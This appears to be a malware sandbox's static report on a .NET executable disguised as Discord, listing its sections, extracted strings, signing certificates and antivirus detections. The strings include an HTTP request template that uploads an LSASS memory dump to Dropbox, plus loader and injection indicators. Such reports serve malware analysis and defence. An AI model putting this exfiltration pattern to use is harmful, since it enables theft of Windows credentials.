Static | ZeroBOX

PE Compile Time

2045-03-23 12:48:17

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00002000 0x0002b420 0x0002b600 7.84907914126
.rsrc 0x0002e000 0x00004778 0x00004800 2.94880268206
.reloc 0x00034000 0x0000000c 0x00000200 0.101910425663

Resources

Name Offset Size Language Sub-language File type
RT_ICON 0x0002e100 0x00004028 LANG_NEUTRAL SUBLANG_NEUTRAL dBase III DBT, version number 0, next free block index 40
RT_GROUP_ICON 0x00032138 0x00000014 LANG_NEUTRAL SUBLANG_NEUTRAL data
RT_VERSION 0x0003215c 0x0000041a LANG_NEUTRAL SUBLANG_NEUTRAL ARC archive data, squeezed
RT_MANIFEST 0x00032588 0x000001ea LANG_NEUTRAL SUBLANG_NEUTRAL XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
<jX(8
jX jX(8
jX$jX(8
YZjX(8
v4.0.30319
#Strings
<>c__DisplayClass6_0
<GetEmbeddedResourceContent>b__0
<>p__0
IEnumerable`1
CallSite`1
WindowsFormsApp1
ClassLibrary1
ReadInt32
Func`2
ToInt64
Action`5
ReadInt16
get_UTF8
<>o__8
<Module>
System.IO
WindowsFormsApp1.Abmlmlsrlpztba
Qcixxcbmgthb
mscorlib
WindowsFormsApp1.Mkjbbznufhvxb
System.Collections.Generic
Docpdvmritpc
Thread
Synchronized
get_Namespace
CreateInstance
defaultInstance
Invoke
Enumerable
IDisposable
FileHandle
RuntimeTypeHandle
GetTypeFromHandle
TransactionHandle
MapViewOfFile
Console
ProcessModule
DLLName
resourceName
get_FileName
machineName
lpName
ExportName
WriteLine
SecurityProtocolType
System.Core
ModuleBase
ReadOnlyCollectionBase
ApplicationSettingsBase
Dispose
X509Certificate
ValidateServerCertificate
certificate
Create
CallSite
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
GeneratedCodeAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
Execute
add_AssemblyResolve
CurrentDomain_AssemblyResolve
Pbfbuuqlp.exe
get_Size
GetFileSize
Gooccf
Jgusig
System.Threading
Encoding
System.Runtime.Versioning
CreateFileMapping
ToString
dwMaximumSizeHigh
dwFileOffsetHigh
get_Length
EndsWith
PtrToStringAnsi
WindowsFormsApp1.Caqwfj
Fzdzmvj
RemoteCertificateValidationCallback
LocalCertificateSelectionCallback
Dvjkptfk
WindowsFormsApp1.Qjorwrpttxzgk
Marshal
WindowsFormsApp1.ClassLibrary1.dll
kernel32.dll
WindowsFormsApp1.Resources.Nzwpcuhhi.dll
ntdll.dll
WindowsFormsApp1.Resources.Kyzeepkvxx.dll
set_SecurityProtocol
GetManifestResourceStream
NetworkStream
SslStream
GetStream
MemoryStream
Program
System
Relbastbpkdn
X509Chain
AppDomain
get_CurrentDomain
WindowsFormsApp1.Lyecngaqnjn
System.Security.Authentication
System.Configuration
NtRollbackTransaction
RtlSetCurrentTransaction
System.Reflection
ProcessModuleCollection
X509CertificateCollection
MissingMethodException
AuthenticationException
InvalidOperationException
get_InnerException
Mxvfpon
CopyTo
CSharpArgumentInfo
WindowsFormsApp1.Dlgnpo
Erbmpeianjuo
dwNumberOfBytesToMap
Gqxldvxqnap
WindowsFormsApp1.Ltpruqhglgpsbp
Pbfbuuqlp
Microsoft.CSharp
WindowsFormsApp1.Lfgptsruzoaq
System.Linq
InvokeMember
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
ServicePointManager
ResolveEventHandler
System.CodeDom.Compiler
ToLower
WindowsFormsApp1.Eeyrudgr
IEnumerator
GetEnumerator
Activator
.cctor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
WindowsFormsApp1.Properties
get_Modules
GetManifestResourceNames
System.Security.Cryptography.X509Certificates
lpAttributes
GetBytes
CSharpArgumentInfoFlags
CSharpBinderFlags
Settings
ResolveEventArgs
SslProtocols
Contains
System.Collections
SslPolicyErrors
sslPolicyErrors
dwDesiredAccess
GetCurrentProcess
GetLoadedModuleAddress
get_BaseAddress
GetExportAddress
System.Net.Sockets
WindowsFormsApp1.Smpxgjmjjfts
Concat
hFileMappingObject
project
flProtect
System.Net
Target
op_Explicit
get_Default
SingleOrDefault
RunClient
SslTcpClient
AuthenticateAsClient
get_Current
GetEmbeddedResourceContent
content
GetByteCount
WindowsFormsApp1.Vjomcivrt
MoveNext
System.Text
Nebilwltmtkxv
WindowsFormsApp1.Tngqpbfaw
Gzrbznudwwztdw
dwMaximumSizeLow
dwFileOffsetLow
Ghupbmx
ToArray
GetExecutingAssembly
CustomLoadLibrary
op_Equality
System.Net.Security
WindowsFormsApp1.Qpvluvjltwz
WrapNonExceptionThrows
Discord - https://discord.com/
Discord Inc.
4Copyright (c) 2020 Discord Inc. All rights reserved.
$a07d7386-b02d-4ed7-b7ea-b5712fd377f6
0.0.52.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
KMicrosoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator
11.0.0.0
!This program cannot be run in DOS mode.
`.rsrc
@.reloc
(}4xj8"
v4.0.30319
#Strings
ClassLibrary1
CompilationRelaxationsAttribute
System.Runtime.CompilerServices
mscorlib
System
Boolean
RuntimeCompatibilityAttribute
DebuggableAttribute
System.Diagnostics
DebuggingModes
AssemblyTitleAttribute
System.Reflection
String
AssemblyDescriptionAttribute
AssemblyConfigurationAttribute
AssemblyCompanyAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
ComVisibleAttribute
System.Runtime.InteropServices
GuidAttribute
AssemblyFileVersionAttribute
TargetFrameworkAttribute
System.Runtime.Versioning
SuppressIldasmAttribute
a36dae25-1418-4437-b0ca-75ffae48ef59
ClassLibrary1.dll
<Module>
Object
<Module>{44779EC3-6714-4DBA-BAC6-FAE57AE22AA7}
ProccesorWatcher
wnAvGk2ZDkNgZ882lP8.Watchers
Record
MulticastDelegate
wnAvGk2ZDkNgZ882lP8.Resolver
<PrivateImplementationDetails>{E8EC9DDF-8EFF-4161-AF4D-EB2E076E6DD8}
__StaticArrayInitTypeSize=256
ValueType
__StaticArrayInitTypeSize=40
__StaticArrayInitTypeSize=30
__StaticArrayInitTypeSize=32
__StaticArrayInitTypeSize=16
__StaticArrayInitTypeSize=64
__StaticArrayInitTypeSize=18
importer
_Serializer
CancelGetter
ClassLibrary
selection
ToString
StartImporter
AppDomain
Assembly
MethodInfo
get_CurrentDomain
MemberInfo
get_DeclaringType
Activator
CreateInstance
op_Equality
get_Name
InvokeMember
BindingFlags
Binder
GetMethods
GetTypes
Environment
LogoutImporter
MemoryStream
System.IO
GZipStream
System.IO.Compression
Stream
CompressionMode
get_Length
IDisposable
Dispose
CollectGetter
ReadGetter
FillGetter
GetType
PrepareGetter
ToArray
_Mapping
Module
CallGetter
FindGetter
typemdt
FieldInfo
GetFields
ResolveType
get_MetadataToken
Delegate
CreateDelegate
SetValue
.cctor
GetTypeFromHandle
RuntimeTypeHandle
get_Assembly
get_ManifestModule
EnableGetter
ResolveMethod
MethodBase
InvokeGetter
ExcludeGetter
IntPtr
Invoke
BeginInvoke
IAsyncResult
AsyncCallback
callback
object
EndInvoke
result
ChangeGetter
$$method0x6000317-1
$$method0x6000332-1
$$method0x6000332-2
$$method0x6000340-1
$$method0x6000340-2
$$method0x6000353-1
$$method0x6000395-1
$$method0x60005b3-1
CompilerGeneratedAttribute
ClassLibrary1.g.resources
aR3nbf8dQp2feLmk31.lSfgApatkdxsVcGcrktoFd.resources
WrapNonExceptionThrows
ClassLibrary
Copyright
2021
$7c158b45-9dc4-4066-8cda-58e028d1a857
1.0.0.0
.NETFramework,Version=v4.0
FrameworkDisplayName
.NET Framework 4
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
PADPADP
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
fSystem.Drawing.Icon, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3ajSystem.CodeDom.MemberAttributes, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089mSystem.Globalization.CultureInfo, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089fSystem.Drawing.Size, System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Icon
IconData
IconSize
System.Drawing.Size
System.Drawing.Size
height
ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
System.CodeDom.MemberAttributes
value__
System.Globalization.CultureInfo
m_isReadOnly
compareInfo
textInfo
numInfo
dateTimeInfo
calendar
m_dataItem
cultureID
m_name
m_useUserOverride
System.Globalization.CompareInfo
System.Globalization.TextInfo%System.Globalization.NumberFormatInfo'System.Globalization.DateTimeFormatInfo
System.Globalization.Calendar
System.Globalization.CompareInfo
m_name
win32LCID
culture
m_SortVersion
System.Globalization.SortVersion
System.Globalization.TextInfo
m_listSeparator
m_isReadOnly
m_cultureName
customCultureName
m_nDataItem
m_useUserOverride
m_win32LangID
%System.Globalization.NumberFormatInfo"
numberGroupSizes
currencyGroupSizes
percentGroupSizes
positiveSign
negativeSign
numberDecimalSeparator
numberGroupSeparator
currencyGroupSeparator
currencyDecimalSeparator
currencySymbol
ansiCurrencySymbol
nanSymbol
positiveInfinitySymbol
negativeInfinitySymbol
percentDecimalSeparator
percentGroupSeparator
percentSymbol
perMilleSymbol
nativeDigits
m_dataItem
numberDecimalDigits
currencyDecimalDigits
currencyPositivePattern
currencyNegativePattern
numberNegativePattern
percentPositivePattern
percentNegativePattern
percentDecimalDigits
digitSubstitution
isReadOnly
m_useUserOverride
m_isInvariant
validForParseAsNumber
validForParseAsCurrency
Infinity
-Infinity
QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a
System.Drawing.Size
height
DBRfhn M
_CorDllMain
mscoree.dll
uT]py4
C#H{5c
%HF]]P
h.[s7[
"5FP#pp
l[-9*qzky
D%[YSK
f/OngNL>
s]Rjbn2
v2rwTP
6e#.5.
3`Q?5]
QSzeEM
?/0Bp5
'z9,?^
ZY8D49F
+mMsTnZ
)7UNv/
%Vtf)Od
>u%&x
e6/3!28[
}xrxY~
vCcO^K
?$xp{
;2c|:p
{0|8v
8y=EZZm
e}@.~:p
@x]{b7
${'j8`
&[`9?w
|4{=f<${
CGi@~r
@Vz]*-
BW:tI\
eOyX69o!
#4+C5M
_}kLb"
U2G;e/
Gds8vv
Q8y{!*
v[0dv<
fAveW_h7;^
fEU;}c
c<~BS4t
F/oNbO
l,KzdN&@
KP"|U![
vMg095
V_%e&TP
7IrV97ou
!uT]j?d
+QGemK4
G\X@{m
[RcW.E
o*,VXR
xU5m@H
vE[{db2
mbGAtSX
i@ceGo
+9LhmY
GMI&Pd
Ge"QoMoJ
>'@>%O
KO1auv,.
!sA8?V
[SgoOSlY
6<a8wz6
NTiW&^0F8
F[D.SI
?S&(7;&
QG?~#TQ
~(jgnD51
d;12+'
M8J{B%_
"s0{uc
FkBs=\fJ
uSQZ/>
@)zLsv
7bj1v&
`B)7f3
:XnpGS
F0vI>T
shGg?A<
n@*A7
SniQnb20
i"1:.!9/
=In#cs
/WN}c9
a1>$BA
cdj*ghg
mCGPZH
]Ngpk
-/''"-
RPJB1
168gl)
QJW{hu
)/?_?L
N5ifkf
XRxLD
c}S!ih
jwn};>U6
J<""*|
^%c^>o
qqM8%7W
--,*.m
Bfh.X8
eaa.e>y
2iafj`
|My!!()
Y!iyy)Qe%nYy
j:&6."
QBR3-#g
US]]SU[Y
oD/Z"<
I1%Qi[3e=Asa58
X`DDtQb6&
0\`qf.(1":
TtqL^P@PQKCL
g'=+<x
Mevf{iqx
tHdtyh1a
Tm(m"BR!
G&HY+7f
q0jF=;+
oG~$xcDa
k]S0!^
H9QMQ'o&>
aka2VmA
+IVi3#
ub|TKYZ(
eeS-eo
UDPD{
`vtBuP
n@0j9<c
~H* QB*
+Qe5,e
S_4&%*|
|Bg"[P
2I|0b<
"j&*ZU
)b\J{&
^{#oK{
}]h2#8
aN'a!u
OsAspb
QFG9(x
SKp[3D
7<el^~FvL
lTN~Vv
|3+gpL
"??7+}T~F
+7_b&|%T
0[Wgn^F
KC-]:uW
il~9qvRJ
T/6m<Kol
6oyo~`
OZZ*{4ri
yaS/>K
af^1hu
*<{?Eux
g/]\11
6z}|s)5
 `gM/
;$+mnD
Gb7!DK
No{Vo^
WZ6iv]
dA'dA_
fcs_jR
s!IunL
XaQpiE
yL]SEW
yHw=k@~
qxNv1j
!TujT#
+y,#.=
>-$N>dY
WYv*A^
m;JRmkzkWA
XeSq0A
BXfLXK4
@ELHKH
( ~H$G
SBzG!+%d
Pji $n
v]_t<.J
\O&6UT>gY
H,P;y/q7
U~M##>
6D+Z;K
!wwdxI
r,>gN'
:1B+ss
et%h1z
CcGYZ[
|0>}J8
rkI{L+z
_\b~3!l"
5@+(c'
D1 .ls
yQTnG@
AobeT@[
umIM]Cf
2z O]<pT0
L<m{QZ
s%#?zc
1CeN3d
*a<En"
,|(0c"
AJeA4}
00SMe]"
d<+MvZ
WYI*+9
]Ki;K8*J
W.W'=S
X-Sf)g
:]OnOM'U
IG~"&#O^
Zgr>>>
dzNN.sR
KHUkB*}A
HE$EB$
koKkY
68$LIj
p_8oS[
]U^u>[<x3?i
aKok_K
b>3oXn
WiDD`B$
?Ml8f~b
-VqZEa
bP:. %%
}(5x^|=
c"_{z}
_43lzmi7
_k\Xk1
O\.K'r
*@SY?9
X{4q1U
3D_!5UH
!DO`t@
-RFlm[
BjVqRh:
YbFP#O
1xWU@ 3
I<@}+I
AZ(7j+
(caC:n0o
fzZrEp
Oh.zfr-
XrNT*}
w3;of
.O5|_4
^}E&[a
L-6=@}Y
[fe<uZI
zJQmFnk
1G^MN}
qJ%3Wr&
o[4Eag
0#o*vi
"3z;C3
Fm[<).
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
DigiCert Inc1
www.digicert.com1+0)
"DigiCert EV Code Signing CA (SHA2)0
180314000000Z
210218120000Z0
Delaware1
Private Organization1
51288621
California1
San Francisco1
Discord Inc.1
Discord Inc.0
_v<WBP
US-DELAWARE-51288620
1http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
1http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
https://www.digicert.com/CPS0
http://ocsp.digicert.com0H
<http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
DigiCert Inc1
www.digicert.com1+0)
"DigiCert High Assurance EV Root CA0
120418120000Z
270418120000Z0l1
DigiCert Inc1
www.digicert.com1+0)
"DigiCert EV Code Signing CA (SHA2)0
+.+1Xf
http://ocsp.digicert.com0I
=http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
:http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0@
:http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
.http://www.digicert.com/ssl-cps-repository.htm0
DigiCert Inc1
www.digicert.com1+0)
"DigiCert EV Code Signing CA (SHA2)
20200910175959Z
DigiCert Inc1
www.digicert.com1!0
DigiCert Assured ID CA-10
141022000000Z
241022000000Z0G1
DigiCert1%0#
DigiCert Timestamp Responder0
https://www.digicert.com/CPS0
2http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
2http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
http://ocsp.digicert.com0A
5http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
iW!]4/q
DigiCert Inc1
www.digicert.com1$0"
DigiCert Assured ID Root CA0
061110000000Z
211110000000Z0b1
DigiCert Inc1
www.digicert.com1!0
DigiCert Assured ID CA-10
.http://www.digicert.com/ssl-cps-repository.htm0
http://ocsp.digicert.com0C
7http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
4http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
4http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
DigiCert Inc1
www.digicert.com1!0
DigiCert Assured ID CA-1
200910175959Z0#
content.dropboxapi.com
<FOLDER>
<DROPBOX TOKEN>
.ClassLibrary1.dll
Nzwpcuhhi
Kyzeepkvxx
ClassLibrary
AssetToken
[*] Done!
Failed to parse module exports.
, export not found.
POST /2/files/upload HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
Host: content.dropboxapi.com
Authorization: Bearer
Dropbox-API-Arg: {"path": "/
/lsass.dmp","mode": "overwrite","autorename": false,"mute": false,"strict_conflict": false}
Content-Type: text/plain; charset=dropbox-cors-hack
Content-Length:
)X71XDAX\QX\YX\aX\iX\qX\yX\
X7.[a.Sa.Kg.c
.#J.;a.3a.+a
$this.SnapToGrid
$this.TrayLargeIcon
$this.Icon
$this.Locked
$this.DrawGrid
progressBar1.Modifiers
$this.Localizable
$this.Language
$this.GridSize
$this.TrayHeight
progressBar1.Locked
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
ClassLibrary
FileVersion
1.0.0.0
InternalName
ClassLibrary1.dll
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
ClassLibrary1.dll
ProductName
ClassLibrary
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
Discord - https://discord.com/
CompanyName
Discord Inc.
FileDescription
Discord - https://discord.com/
FileVersion
0.0.52.0
InternalName
Pbfbuuqlp.exe
LegalCopyright
Copyright (c) 2020 Discord Inc. All rights reserved.
LegalTrademarks
OriginalFilename
Pbfbuuqlp.exe
ProductName
Discord - https://discord.com/
ProductVersion
0.0.52.0
Assembly Version
0.0.52.0
RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference
RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference
RAny use of this Certificate constitutes acceptance of the DigiCert CP/CPS and the Relying Party Agreement which limit liability and are incorporated herein by reference
Antivirus Signature
Bkav Clean
Elastic Clean
MicroWorld-eScan Clean
FireEye Generic.mg.6e4b60834900fb32
CAT-QuickHeal Clean
Qihoo-360 Clean
McAfee Artemis!6E4B60834900
Cylance Unsafe
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
BitDefender Clean
K7GW Clean
Cybereason malicious.2c247b
Baidu Clean
Cyren Clean
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of MSIL/Injector.VLM
APEX Malicious
Avast FileRepMalware
ClamAV Clean
Kaspersky UDS:Trojan-PSW.MSIL.Stelega.gen
Alibaba Trojan:MSIL/Injector.da410c9f
NANO-Antivirus Clean
ViRobot Clean
AegisLab Clean
Rising Trojan.Injector!8.C4 (CLOUD)
Ad-Aware Clean
Emsisoft Trojan.Crypt (A)
Comodo Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Artemis!Trojan
CMC Clean
Sophos Clean
Ikarus Trojan.MSIL.Inject
GData Clean
Jiangmin Clean
Webroot Clean
Avira Clean
MAX Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Trojan:Win32/AgentTesla!ml
Cynet Malicious (score: 100)
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Gen:NN.ZemsilF.34686.mm1@a0ofPRo
ALYac Clean
TACHYON Clean
VBA32 Clean
Malwarebytes Malware.AI.4092783266
Panda Clean
Zoner Clean
TrendMicro-HouseCall Clean
Tencent Clean
Yandex Clean
SentinelOne Static AI - Malicious PE
eGambit PE.Heur.InvalidSig
Fortinet Clean
AVG FileRepMalware
Paloalto generic.ml
CrowdStrike win/malicious_confidence_90% (W)
MaxSecure Clean
No IRMA results available.